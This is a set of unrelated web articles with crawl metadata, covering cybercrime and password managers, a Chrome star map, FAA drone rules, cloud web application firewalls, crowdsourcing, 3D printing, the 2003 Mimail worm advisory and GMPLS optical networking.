- 10% of all online adults have experienced cybercrime on their mobile phones
Are You Protected?
So what can you do to protect yourself from cybercrime? That’s where the “prevention” part comes in, and there are steps you can take. Your online identity is the sum total of your vulnerable personal information, including credit card numbers, social security number, usernames, email addresses and passwords. This data can and must be protected.
A secure password manager like Keeper is essential to make sure your passwords are strong and encrypted, and to ensure that private data stays exactly that: private. Keeper for your computer, your smartphone, or your tablet is the solution to the scary threat of cyber attacks. | <urn:uuid:8340930f-ed81-4dbc-86eb-9ba375b63345> | CC-MAIN-2017-04 | https://blog.keepersecurity.com/2012/12/20/the-truth-about-cybercrime-today/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00571-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935172 | 350 | 2.578125 | 3 |
A new Google Chrome workshop virtually reproduces 100,000 nearby stars in just one tab in your web browser. The term "nearby" in this context being relative, of course.
The visualization can be accessed here, and it's a really effective gateway to procrastination. You can zoom in past Barnard's Star or Alpha Cassiopeiae on your way to the Sun. Or you can click the discreet "take a tour" icon in the top right corner of the screen for an educational presentation that begins with the Sun and then pans out, putting everything in perspective, such as the actual distance of the Voyager-1 from Earth or the proximity of other stars to the Sun. And it's all done with some eery music playing in the background, of course.
Google credits Wikipedia for the star renderings and for images of the galaxy, along with several observatories. Images of the Sun were provided by NASA and several other science teams, while researchers and agencies from across the world chipped in data on the stars. Oh, and if you recognize the music, then you must have played Mass Effect; Google tapped Sam Hulick, who scored the video game, for the accompanying soundtrack, which, while perfectly ominous for the scene it accompanies, can get to be a little much for those who keep the tab open for too long while trying to write a blog post about it.
As I mentioned, it's a great, almost literal escape for the middle of the workday. But for those who would nitpick the project for accuracy, Google was one step ahead with a disclaimer:
Warning: Scientific accuracy is not guaranteed. Please do not use this visualization for interstellar navigation. | <urn:uuid:c43c2615-5c61-4996-948b-908599dfea3c> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2223504/opensource-subnet/google-reproduces-100-000-stars-in-chrome-experiment.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00113-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939937 | 344 | 2.921875 | 3 |
The Federal Aviation Administration (FAA) and the White House proposed guidelines last week on unmanned aircrafts, finally responding to industry pressure to ease restrictions on remotely piloted aircraft.
The FAA’s proposal allows private use of drones weighing 55 pounds or less, flying at altitudes up to 500 feet and speeds less than 100 miles per hour. For the sake of comparison, the Washington Monument is about 550 feet tall, and a Cessna private propeller plane cruises at about 120 mph. The FAA’s rules would bar drones from flying near airports or at night.
Those new rules affect a host of industries and, potentially, government agencies. Here are six things to know about the proposal:
1. Hold that delivery.
The FAA effectively grounded plans for companies such as Amazon by requiring that pilots be certified and that they operate their drones within their own field of vision. Amazon’s plans for drone-home delivery won’t fly if that rule survives the review process.
Department of Transportation Chief Anthony Foxx said at Washington, D.C.’s Union Station that the government is not closing the doors on delivery, just trying to ensure safety. “I actually would be happy to have our team engage with not only Amazon, but other users who may feel like there’s more that should be done and in fact our rule making process allows for public comment.”
2. Limitless possibilities.
The White House drone memorandum sees potential uses for unmanned aircraft in agriculture, law enforcement, coastal security, military training, search and rescue, first responder medical support, and more. Civilian uses, including recreation, movie making, real estate sales and development, and news coverage, are just a few other areas where unmanned aircraft could prove useful.
The memo notes concerns about drone use and protecting civil liberties, but privacy advocates howled over vague verbiage such as requiring that gathering information with drones can only be done for an “authorized purpose.”
3. Public notice required.
Government agencies employing drones will have to provide a “notice to the public” where drones operate and release an annual summary of the types of missions they’re conducting.
Within those guidelines, individual agencies will have authority to implement rules for their own use.
The directive requires Feds to disclose when and where they fly. Taxpayer-funded drones will have to reveal what they do with any data collected during aerial surveillance and the FAA retains the right to inspect a drone or revoke an operator’s certification at any time.
“We want to capture the potential of unmanned aircraft and we have been working to develop the framework for the safe integration of this technology into our airspace,” Department of Transportation Secretary Anthony Foxx told NPR.
4. Warm Reception – So Far
Brian Wynne, president of the Association for Unmanned Vehicle Systems International (AUVSI), called the FAA’s proposal a “good first step in an evolutionary process.”
“This technology holds tremendous promise for many commercial applications in the areas of science, safety, and security, including everything from aerial surveying to precision agriculture,” Sen. Maria Cantwell (D-Wash.), who is the top ranking Democrat on the Senate Subcommittee on Aviation Operations, Safety and Security, said in a statement. “I look forward to working with the FAA and my colleagues to develop a framework that balances economic potential with protecting privacy and the safety our national airspace system.”
But Sen. Charles Schumer (D-NY), called for more business-friendly regulations. “These FAA rules are a solid first step but need a lot more refining. The inclusion of the rule that drones must be flown within the operator’s line of sight appears to be a concerning limitation on commercial usage; I urge the FAA to modify that as these rules are finalized,” Schumer said, according to USA Today.
5. Privacy Concerns
The American Civil Liberties Union (ACLU) expressed concern over the expanded use of drones domestically, despite the FAA’s efforts to address privacy issues.
“This proposal…falls short of fully protecting the privacy of Americans,” ACLU Legislative Counsel Neema Singh Guliani said in a statement.
6. Thousands of Users
Soon, you can expect to see drones flying over construction sites, inspecting cell towers, and checking for forest fires, Ben Popper writes at The Verge. The FAA estimates that with these new rules in place, more than 7,000 companies will be able to fly drones in the first three years.
Agencies will need time to understand and explore all the ways drones might be used and what the implications could be on the public, both in terms of safety and privacy.
Congress and the public will also have a say, and it could take years before the policies are in place and enforced. American citizens should reap the most benefits as they enjoy better technology to improve our country’s infrastructure – but will new regulations quell fears of Orwellian surveillance in the sky?
Want to weigh in? Post a comment below or email me at firstname.lastname@example.org. | <urn:uuid:b41f2571-08cf-4ca8-b163-e485ca0d1ca9> | CC-MAIN-2017-04 | https://www.meritalk.com/articles/drones-r-us-what-you-need-to-know-about-the-proposed-rules/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00415-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.931131 | 1,067 | 2.59375 | 3 |
Cloud computing was not designed for security, although organizations such as Cloud Security Alliance (CSA) and Open Web Application Security Project (OWASP) are making great strides in helping the industry solve the myriad security problems confronting cloud computing. The benchmark guidelines established by the CSA in the document, Guidance for Critical Areas of Focus in Cloud Computing, is a great first step. This article is intended to pick up where the CSA guide left off in terms of defining what a distributed web application firewall (dWAF) should look like in order to meet the standards set within the CSA document.
In order to accurately outline how a dWAF is possible while maintaining all the benefits of a completely virtualized environment – reduced IT overhead, flexible footprint management, virtually unlimited scalability – a brief overview of cloud technology is needed. Far more than simply maximizing current hardware resources to benefit from unused CPU power, today there are three main technologies available in a cloud that provide the backbone for real productivity gains and compelling business services for companies that don’t want to invest in the hardware scaling burdens common today.
Software as a service (SaaS) offers users virtualized software through a thin-client, usually any standard web browser. The benefit for users is access to software without any of the headaches of owning the programs – scaling and resources are taking care of, and patching and upgrades are managed.
Platform as a service (PaaS) provides users with virtual databases, storage and programming languages with which custom applications can be built. This service provides nearly unlimited resources behind the platform and allows customers to scale throughout the lifetime of the application. It is an effective solution for companies ranging from the very small to those serving millions of customers. The customer does not worry about the infrastructure needed to run the services and is billed in per usage model.
Infrastructure as a service (IaaS) allows users access to virtually unlimited resources to build and manage their own virtual network. Customers can commission and decommission virtual resources depending on their need. The most obvious benefit is that there is no end-of-life for hardware anymore for the customers. The providers move them according to their service level from hardware to hardware without any downtime.
The common user benefit of services available through a cloud is access to key resources via the Internet, which provides an incredible degree of scaling without the need to invest in expensive hardware infrastructure.
Cloud applications are highly exposed to threats
Accessing cloud technologies requires a thin-client, and the world’s most commonly used thin-client for this purpose is a web browser. This means the vast majority of all applications on the Internet have some kind of web and / or application server on which the business logic is implemented. Currently, most of the money spent on security goes into firewalls and antivirus solutions, but in the last 10 years the typical target for attacks has shifted from the network layer to the application layer because the operating systems and services available to the general public were cut down. As a result, it is now easier to target the application logic or framework of an application than the actual server behind the hardened network perimeter. Applications are mostly developed by the businesses themselves and not every developer considers security the highest priority, which leads to a wide variety of problems.
The IBM X-Force 2008 Annual Report highlights that web application vulnerabilities are the Achilles’ Heel for corporate IT security. The impact of not being able to secure these vulnerabilities is far reaching.
Further, attack vectors increase exponentially in correlation with the mainstream adoption of cloud computing. Their increase is dictated by hosting and delivering infrastructure, platform and software. Establishing a comprehensive patch management system is the common solution offered by most in the industry, however, in practice this approach has proved very difficult and costly. Typical web applications are built on open source components, by third-parties, who rely on web frameworks. This approach has the obvious benefits of interoperability and shortened development time, however, patching becomes exponentially more difficult. A flaw in one piece of open source code must be patched for each instance it is used throughout each application in which it is used. In a cloud setting, this becomes a very large issue.
Applications developed specifically for a cloud are often very complex, designed for access speed, scalability and flexibility for third-party development through an open API. For example, Salesforce.com, Google Docs, MySpace, Facebook and Twitter, are all prime examples. These “as a Service’ applications are developed two ways today: by moving on-premise applications to a cloud, and by developing and operating applications directly in a cloud.
Applications that are forced out of the internal company network and into a cloud carry the risks of exposing protected software to web threats it was not designed to combat. Common security threats include injection attacks, cross site scripting or cross site request forgery.
There are a variety of services available for developing in a cloud, such as MS Azure Services, Google App Engine or Amazon EC2. There are many security challenges involved in developing web applications in a cloud. For example parameter validation, session management and access control are ‘hotspots’ for attackers. Developers not trained in those three fields of application development will most definitely create / develop applications which have security problems.
Why a traditional Web application firewall will not work
In a cloud, the infrastructure and the services are shared between customers, meaning one set of hardware is used by many business, organizations and even individuals. Each of these cloud operator customers adds a unique layer of policy settings, use-cases and administrative enforcement requirements. For the cloud or service provider, security quickly becomes very complex. The average provider may have 10,000 customers subscribing to its service, each with varied policy settings for individual divisions within the company. The service provider now has to manage an nth degree of application filter settings.
Currently, web application firewalls (WAF) and other security solutions are restricted to hardware appliances, which creates a serious bottleneck for cloud service providers. Dedicated hardware boxes simply don’t allow for reasonably scalable levels of multiple administrators duties within a box’s singular security policy mechanism. Ironically, in addition to the traditional network hardware, cloud service providers are forced to have a rack full of dedicated WAF machines – one per customer – that take up space and eat up resources. Security becomes counter to the efficiency promises of a fully virtualized environment. This cost is passed on to customers, increasing adoption barriers to mainstream cloud computing.
In an ideal world, applications would be designed from the ground up to meet the rigors of a virtualized world, integrating security measures directly into the applications and thus solving a core problem with current cloud computing. Until the industry reaches this ideal), traditional web application firewall boxes are preventing the industry from reaching the full potential of a cloud computing.
Defining the distributed Web application firewall (dWAF) for cloud protection
Web application security in a cloud has to be scalable, flexible, virtual and easy to manage. A WAF must escape hardware limitations and be able to dynamically scale across CPU, computer, server rack and datacenter boundaries, customized to the demands of individual customers. Resource consumption of this new distributed WAF must be minimal and remain tied to detection / prevention use instances rather than consuming increasingly high levels of CPU resources. Clouds come in all sizes and shapes, so WAFs must as well.
The dWAF must be able to live in a wide variety of components to be effective without adding undue complexity for cloud service providers. Today’s providers are using a variety of traditional and virtual technologies to operate their clouds, so the ideal dWAF should accommodate this mixed environment and be available as a virtual software appliance, a plug-in, SaaS or be able to integrate with existing hardware. Flexibility with minimal disruption to the existing network is central.
A web-based user interface must allow customers to easily administrate their applications. Configuration should be based on the applications under protection, not defined by a singular host, allowing far more granular settings for each application. Ruleset configuration must be supported by setup wizards. Statistics, logging and reporting has to be intuitive and easy to use and must also integrate seamlessly into other systems. Most importantly for a dWAF, multi-administrator privileges must be made available and flexible enough to effectively manage widely divergent policy enforcement schemes. Cloud providers should look for a set of core protections.
Detection and protection
Foundational security using black, white and grey listings for application requests and responses must be possible. To make sure pre-set policy enforcements are not activated or deactivated without approval from an administrator, deployment and policy refinement through establishing rulesets must be possible in a shadow monitoring or detection only mode. Once the shadow monitoring ruleset is stable, only then should it be allowed to deploy in an enforcement mode on the dWAF. This allows complete transparency for the administrator into the real-world effect of this ruleset, while at the same time allowing layered rulesets to be tested without compromising existing policy enforcement. Avoiding false positives and relaxed established defenses are essential for a real-world, usable dWAF in a cloud.
Automated learning and ruleset suggestions based on intelligent algorithms or recommendations from a static source code analyzer or web vulnerability scanner are also desirable from a manageability view. Again, this only holds true if the administrator retains full control over activation / deactivation of each ruleset. Without this control, wanted traffic may become blocked and policy settings would become compromised.
Pro-active security functions are highly recommended to reinforce any application in a cloud. Detection is simply not enough for today’s web application security. Features like transparent secure session management, URL encryption and form-field virtualization will provide strong deterrence to attack, while saving application development and deployment time. These features are effective because session management, URL encryption and form-field virtualization is done at the dWAF level and not in the application itself.
An authentication framework support that enables businesses to consolidate their applications under one management schema is also desirable for a dWAF. This enables users to handle the authentication in front of their applications rather than behind, which adds another perimeter of security. A consolidation of all applications with dedicated rights-management ability is also a strong usability function that will make an administrator’s life easier.
Integration with existing technology
Avoiding vendor-lock-in is a common best-practice for both networking and application security. Any technology that is added to an infrastructure, platform or application itself must connect as seamlessly as possible with existing technology. Security is all about layering technologies to create the best possible protection, so a dWAF must communicate freely between a security incident and the event management system (SIEMs). | <urn:uuid:35cc3d95-41d0-4259-9b5e-6e39f266c281> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2009/07/23/safety-in-the-clouds-vaporizing-the-web-application-firewall-to-secure-cloud-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00535-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.931546 | 2,203 | 2.53125 | 3 |
So, what are the downsides of crowdsourcing? One of the pitfalls that catch businesses by surprise is privacy concerns. Netflix crowdsourced the improvement of its movie recommendation algorithm. The algorithm is critical to its business effectively helping users find new movies-something crucial in order to retain its users. The contest: improve the existing ranking algorithm by 10 percent and win $1 million.
The contest attracted scientists from around the world. The Netflix data was so rich and deep that it promised to yield broader insights about data analysis. Eventually, the scientists formed teams which collaborated to win the prize. Unfortunately, Netflix's attempt to run the contest again was cancelled due to a lawsuit that challenged the release of user preference data. So, crowdsourcing does not always fit the data, and there may be special concerns around private information.
Another issue that comes up is unexpected bias. GalaxyZoo is a Website where amateur astronomers can label pictures of galaxies taken by telescopes. They created the largest database of galaxies ever assembled. The project led to many academic papers and discoveries. However, one finding was perplexing: there were more clockwise spiral galaxies than counterclockwise spiral galaxies. Astronomers wondered if there some galactic Coriolis effect that makes galaxies spiral clockwise. After running a mirrored set of the same images, researchers found that users had a subtle bias towards labeling ambiguous spirals galaxies as clockwise. | <urn:uuid:2f90ea83-06be-489b-874a-981c7f9d5579> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Web-Services-Web-20-and-SOA/How-to-Manage-Successful-Crowdsourcing-Projects/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00075-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944108 | 279 | 2.84375 | 3 |
You've probably heard about 3D printing, a way of converting a computer file into a solid, physical object using a specially designed printer. The technology has been around for more than a decade, but it's always been the realm of industrial designers and manufacturers that could spend tens -- even hundreds -- of thousands of dollars on printers the size of refrigerators.
Now it's coming to your desktop, courtesy of AutoDesk, a developer of sophisticated software known as CAD (computer-aided design).
AutoDesk this week launched two impressive software applications: One allows you to convert a picture (actually a whole bunch of pictures) into a digital file that can be printed as a solid plastic or metal model, while the other is used to convert a computer model into a sort of three-dimensional jigsaw puzzle made of cardboard or other materials. And best of all, the software is free, and if you don't have a 3D printer (who does?) you can upload the files you create to an AutoDesk partner, which will give you a cost estimate and then manufacture and ship as many of the objects as you want.
Actually, 3D printers have gotten a lot cheaper; the folks at AutoDesk told me you can buy one for as little as $1000, but I assume you won't run out and acquire one right away. I'll give you the highlights of my 90-minute visit with AutoDesk to talk about 3D printing, but I'd urge you to visit the company's Web site (and the links I provide below) to find out more.
Print in 3D or make a 3D jigsaw puzzle
3D printers are similar to inkjet printers, but instead of depositing ink on a page, they create three-dimensional objects by laying down successive layers of liquid plastic, powdered metal or other materials on top of a base. The better the printer, the more resolution-- that is, detail -- the object will contain.
The statue of Buddha, pictured above, was printed and rendered into plastic using AutoDesk's new program called 123D Catch and a 3D printer. To start the process, an AutoDesk employee slowly walked around the statue, taking a series of 50 or 60 photos from different angles. Those photos were then uploaded into the program and sent via the Internet to an AutoDesk server where they were converted into a 3D file.
The file was then moved to a 3D printer, which produced the statue. Because it's so large, it would cost about $800 for you to do the same thing, but a smaller version of the Buddha statue would only cost about $50, said Hendrik Bartel, an Autodesk senior product manager.
The program also allows you to convert those same photos into a 3D animation you can post on YouTube or email to someone else.
Because all of the complex calculations to turn the photos into a 3D file are performed in the cloud, you can run the program on a standard Windows PC. A Mac version of 123D Catch will follow in the not-to-distant future.
A second -- and for now, Mac only -- application called 123D Make takes a 3D image of an object and converts it into a file that in turn instructs a laser-guided saw to inscribe a pattern onto a flat surface such as cardboard or wood. The patterns can then be cut out and assembled by the end user (you) to form a 3D model of the original image.
The easiest way to grasp this is to think about starting with a solid object, and then slicing it vertically or horizontally or at an angle. Before long you'd have a bunch of flat slices sitting on your desk. The program numbers each slice and prints out directions for reassembling the slices into a 3D model that you glue together. The original images can be imported from another 3D program or you can work with one of the images that comes with the application.
Obviously, very few of us have laser-guided cutters, so you can simply upload the file to AutoDesk, get a cost estimate from one of the company's partners, who will then send you a stack of cardboard with the puzzle pieces laid out and ready to be cut with a sharp knife and assembled. Those puzzles would make great holiday presents, though some younger recipients might find the puzzle a bit, well, puzzling.
Catch and Make are part of a larger family of AutoDesk consumer 3D printing products which you can read about here. | <urn:uuid:30d02d69-a479-4211-9abc-4dffbc01a459> | CC-MAIN-2017-04 | http://www.cio.com/article/2371827/consumer-technology/autodesk-brings-3d-printing-to-your-desktop.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00561-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950879 | 919 | 2.796875 | 3 |
A Web access management (WebAM or WebSSO) system is middleware used to move the authentication and authorization of users out of individual web applications, to a shared platform.
A WebAM system intercepts initial contact by the user's web browser to a web application and either verifies that the user had already been authenticated (typically tracking authentication state in a cookie) or redirects the user to an authentication service, where the user may use a password, token, PKI certificate or other method to sign in.
Once a user is authenticated, the WebAM system connects the user to the application and passes identity data to the application, which need not authenticate the user itself. Some applications support direct injection of identities and require no password at all, but other applications require users to connect with a password, in which case the WebAM system must maintain a database of passwords for all users, injecting them on demand.
WebAM systems can also limit user access within applications, for example by filtering what URLs users can access or through closer integration with individual applications, which use a WebAM API to decide whether a user should be allowed to access a given function or not.
WebAM systems normally rely on an LDAP directory to identify and authenticate users.
WebAM systems are mainly designed to work with applications that cannot externalize identification, authentication or authorization using standards-based federation protocols. | <urn:uuid:dced5671-d714-4018-b0c3-743c62f075a3> | CC-MAIN-2017-04 | http://hitachi-id.com/resource/concepts/web-sso.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00103-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.887321 | 282 | 2.640625 | 3 |
On the Cutting Edge of High-Tech
The Computing Research Association recently released a report that lists five “Grand Research Challenges” in high technology. These challenges, which relate to building information systems of the future, provide long-term goals for the research community and read almost like science fiction. Appearing on the list are a post-disaster safety net and “cognitive partners” for humans including robots and software.
The report is the result of a three-day workshop supported by the National Science Foundation, attended by 65 leading computer science and engineering researchers. The invitation-only conference asked attendees to choose five “deliberately monumental” research challenges. Attendees were supposed to choose challenges that would require at least 10 years of concentrated research in order to progress. This workshop was the first in a series of workshops on Grand Challenges for IT research. The next workshop is scheduled for November 2003 and will cover the topic of computer security.
According to the report, the five Grand Challenges are:
- Create a Ubiquitous Safety.Net: In order to minimize damage from disasters and to save lives, a Web of systems should be in place to predict, prevent, mitigate and respond to natural and man-made disasters.
- Build a Team of Your Own: Cognitive partnerships of humans with software and robots will allow people to achieve complex goals. The technological agents will help amplify physical capabilities as well as attending to specialized thought processes. This, according to the report, will bring about greater personal productivity and effectiveness.
- Provide a Teacher for Every Learner: There’s no doubt that learning is now lifelong. This challenge involves helping all students to receive instruction that is tailored to their personal learning styles in “an environment of unlimited digital resources.”
- Build Systems You Can Count On: Reliable and secure systems are a necessity, and this great challenge is to ensure that all systems—everything from the regional electric grid to individual heart monitors—are reliable and secure.
- Conquer System Complexity: Large-scale information systems are complex. If researchers can overcome this complexity, they can bring about greater use of information systems and help realize the four preceding challenges.
The report states, “In the future, we can expect our computational infrastructure to offer an even more impressive range of social and economic benefits as it grows to include billions of people worldwide. Information technologies have the potential to reduce energy consumption, provide improved health care at lower cost, enhance security, reduce pollution, enable further creation of worldwide communities, engender new business models and contribute to the education of people anywhere in the world.”
You can find the report at http://www.cra.org/Activities/grand.challenges/.
Emily Hollis is associate editor for Certification Magazine. She can be reached at firstname.lastname@example.org. | <urn:uuid:fa19e801-4703-4a6a-a09d-e16b7502d191> | CC-MAIN-2017-04 | http://certmag.com/on-the-cutting-edge-of-high-tech/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00405-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937293 | 584 | 2.890625 | 3 |
Mimail - A New Attack Via an Old Breach
02 Aug 2003
New fun and games from Russian virus writers
Kaspersky Lab, a leading expert in information security would like to inform you about Mimail, a new Internet worm. Our round-the-clock technical support has already heard of numerous computers infected with this new worm.
Mimail is a typical Internet worm that is spread via email. Infected mail contains a false sender address making it difficult to identify the sender and contains the following text:
your account 'number' (this is a random number)Body:
I would like to inform you about important information regarding your email address. This email address will be expiring.
Please read attachment for details.
Best regards, Administrator
Mimail is similar to other worms such as Klez and Lentin (Yaha) in that it enters using security breaches in Internet Explorer. The attachment, MESSAGE.ZIP contains another file - MESSAGE.HTML.
If the user opens MESSAGE.HTML, the built in Java script enters via Exploit.SelfExecHTML and copies itself onto disk files. It then releases a carrier-file named VIDEODRV.EXE and registers this file in the Windows autorun register. Thus, VIDEODRV.EXE is launched every time the computer is re-booted.
Mimail also creates several other files in the Windows directory: EXE.TMP - an HTML worm, ZIP.TMP an archive worm and EML.TMP - the email part.
Microsoft discovered the Exploit.SelfExecHTML problem in March 2002 and has released a special patch
for the Internet Explorer. Kaspersky Lab strongly recommends downloading this patch in order to prevent further security isssues via this breach.
The rapid spread of Mimail is a good reminder that dangerous programs are not only found in EXE files. "It is always a good idea to check all files for viruses before booting up", comments Eugene Kaspersky, founder of Kaspersky Lab and head of anti-virus research.
Mimail continues to spread by scanning separate directories on the local hard drive and. It extracts email like text strings on record and records them into EML.TEMP in the Windows directory. Mimail then uses the direct connection to the mail server to send copies of itself to these recipients.
Mimail is likely to be the work of Russian virus writers. The hackers used technology practically identical to the Trojan StartPage
, which was also written in Russia.
"We were lucky this time", notes Eugene Kaspersky, "Mimail is a relatively harmless worm with no serious side effects. The danger is that Mimail takes advantage of a vulnerability in the Internet Explorer, which provides a dangerous precedent for other virus writers and hackers.".
Security measures against Mimail can be found in the Kaspersky® Anti-Virus databases, while a more detailed description of the worm is available in the Kaspersky Virus Encyclopedia | <urn:uuid:362fa261-5d48-43cf-8388-04c595076899> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/virus/2003/Mimail_A_New_Attack_Via_an_Old_Breach | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00160-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.896806 | 631 | 2.578125 | 3 |
Bandwidth requirements in networks are constantly changing, driven by the deployment of new services and the increasing penetration of existing services. These requirements are further complicated by the migration to on-demand services and to IP-based services.
Factoring into this the need to maintain quality of service (QoS) across a wide range of services, effective bandwidth management has become critical to today's network. At the competitive level, pressures are growing to accelerate service delivery and network migration while lowering overall network costs (CapEx and OpEx). To meet all these demands, an overall bandwidth management mechanism is needed which substantially automates network operation while providing flexibility and ensuring adequate QoS. This is particularly true at the optical layer, where requirements are rapidly evolving. GMPLS (generalized multi-protocol label switching) provides such a mechanism and is available today.
MPLS (multi-protocol label switching) has been used in IP networks for many years to couple Layer 2 devices (for example, Ethernet switches) more tightly to IP routers at Layer 3. As such, MPLS allows these Layer 2 devices to serve as extensions of the routers at Layer 3, thereby giving much better control and integration of the overall IP network at both Layers. MPLS was initially developed to bring the speed of Layer 2 switching to Layer 3, but MPLS has found many wider applications and benefits and is now broadly standardized and in use in networks across the country.
In an MPLS network, edge routers assign a "label" to incoming packets. As these packets traverse the network, a label switched path (LSP) is created from the ingress to the egress point. These packets are then forwarded along the LSP by a label switch router (LSR), which makes forwarding decisions based on the contents of the label, rather than by the IP address. Attributes are assigned to the label that define how the LSR should handle the packets in the LSP.
LSPs can be created based upon a wide range of criteria and for a wide range of reasons. Typically, LSPs are used to route around or avoid network congestion, to guarantee a certain level of performance, or to create IP tunnels through a network for virtual private networks (VPNs). As such, LSPs look very much like circuit-switched paths in ATM networks. However, MPLS is not constrained to a particular Layer 2 technology and can create end-to-end circuits with defined performance over any transport layer. More typically today, MPLS is used within Ethernet networks.
Initial efforts to standardize MPLS began in 1997 at the IETF (Internet Engineering Task Force), which is still the primary standards body for MPLS, though several other organizations also create or contribute to MPLS standards and extensions. As MPLS evolved, it became widely recognized that the benefits of MPLS could be extended to Layer 1 at the optical level, and GMPLS was developed to address this need. The IETF is also primarily responsible for GMPLS standards. While both MPLS and GMPLS standards are still evolving and being developed, core standards are in place and in use today for both.
GMPLS extends MPLS into the Layer 1 optical network by allowing the creation of label switched paths in the optical network. Thus, GMPLS can serve as a control mechanism for devices such as optical add-drop multiplexers (OADMs) and optical cross-connect switches (OXCs), operating in both the wavelength (DWDM lambda) and spatial domains.
GMPLS supports both peer and overlay operational modes. In the peer mode, all devices in a given network domain interoperate over the same control plane. This provides true operational integration of OADMs, OXCs, and routers. Routers have visibility into the optical network topology and peer directly with OADMs and OXCs. In the overlay mode, the optical and routed IP layers are separate. In this mode, GMPLS is used to manage and optimize the optical layer without interaction with Layer 3. To date, most deployments of GMPLS use the overlay model, but provide a future migration path to the peered model.
Overlay GMPLS brings significant traffic engineering and management capabilities to optical networks and supports virtually full automation of optical network operations, including topology auto-discovery, span loss measurement, network element and inventory discovery, optical layer turn-up, dynamic network optimization, fault detection and correction, service turn-up, wavelength set-up and tear-down, node insertion, and network evolution. The benefits of a GMPLS-based optical network are obvious: a drastic reduction in operational costs and greatly accelerated network upgrades and delivery of new services.GMPLS at the optical layer
While a broad discussion of GMPLS is beyond the scope of this article, a brief overview is useful to understand how GMPLS works at the optical layer. As already mentioned, MPLS works by creating label switched paths. In optical networks, these LSPs behave similarly to circuits and may be defined as anything sufficient to identify a traffic flow: a fiber, a lambda, a timeslot, etc.
The LSPs in the optical network are established through the use of routing and signaling protocols. In GMPLS, OSPF (Open Shortest Path First) and IS-IS (Intermediate System to Intermediate System) interior gateway routing protocols (IGPs) are used to exchange information between OADMs and OXCs about network topology, resource capabilities and availability, and network policies.
This information is then applied as input into a constraint-based algorithm that computes network paths based upon topology, resource availability, and service requirements. Constraint-based routing allows the network to automatically provision additional bandwidth based upon congestion, shifting service or content-on-demand requirements, or other network parameters. Once an appropriate path has been defined, a signaling protocol such as RSVP-TE (Resource Reservation Protocol for Traffic Engineering) or CR-LDP (Constraint-Based Label Distribution Protocol) is used to create the service connection along the path and reserve resources for it. Additional link management functions are implemented using LMP (Link Management Protocol), which runs between adjacent nodes. LMP provides control channel connectivity and failure detection. Once the path is established end-to-end, user traffic may flow through it.
Of course, GMPLS can only provide as many capabilities as are supported by the underlying OADMs and OXCs in the network. And since we are discussing automated reconfiguration of the network by GMPLS to control bandwidth, this implies the OADMs and OXCs in the network must also be fully reconfigurable. To achieve the full benefits of GMPLS, this means that all essential operating parameters of the OADMs and OXCs must be remotely configurable via software.
Figure 1: GMPLS architecture with reconfigurable optical
add/drop multiplexer (ROADM).
To address these requirements, a new class of reconfigurable OADMs (ROADMs) has been developed which provides fully automated and remote network configuration (see Figure 1). To provide this capability, four elements are essential to a ROADM. First, the ROADM must provide a means of selectively dropping wavelengths at nodes where local traffic is to be handed off (or passing these wavelengths directly through in the optical domain to their destination). Typically this is handled by a wavelength selective switch (WSS), which ideally should provide non-restrictive, single wavelength granularity. Secondly, the ROADM must support tunable lasers so that wavelengths may be remotely assigned or recycled at any time. Third, the ROADM should provide an optical backplane, which eliminates multiple manual optical jumpers and the need to roll a truck to re-configure these jumpers when network changes are made. Finally, the ROADM must support the GMPLS control plane which provides the intelligence and control for network automation.
Figure 2: GMPLS architecture with reconfigurable optical switching platform.
Similarly, a new class of reconfigurable OXCs has emerged to provide automated optical switching between fibers and networks, wavelength translation, and multicast service replication for services such as broadcast digital TV (see Figure 2).
As with ROADMs, these optical switching platforms provide fully remote reconfiguration and typically integrate wavelength transport in the platform along with GMPLS. The key element here, of course, is a non-blocking, redundant switch fabric to provide the cross-connect capabilities. This switching may be done in the optical or electrical domain, but doing so in the electrical domain allows additional traffic grooming at the protocol or packet level and enables additional regeneration, reshaping, and retiming of the signals at each node to simplify network engineering. These platforms are ideal for aggregation applications, mesh networks, and n-degree networks.
As networks migrate to peered GMPLS, significant additional capabilities can be realized. With routers peered directly with OADMs and OXCs, these Layer 1 devices can be controlled at Layer 3, which enables routers to reconfigure the optical network. This opens the door for assigning lambdas on-demand based upon congestion avoidance, increased bandwidth requirements driven by content-on-demand, or the need to create new protection paths through the network.
GMPLS is primarily focused today on automating the operation of optical networks, enabling automated network self-discovery, optical layer turn-up, dynamic real-time network optimization, and network evolution. This is particularly of value in WDM (wave division multiplexing) networks where manual engineering, configuration, and provisioning are expensive and time-consuming. GMPLS greatly reduces the operational complexity of WDM optical networks while accelerating network and service turn-up. Future implementations of GMPLS will allow greater interoperability at the optical layer between equipment in the network and will allow bandwidth to be assigned on-demand in real time at the optical layer (wavelength routing) to support dynamically shifting network requirements.
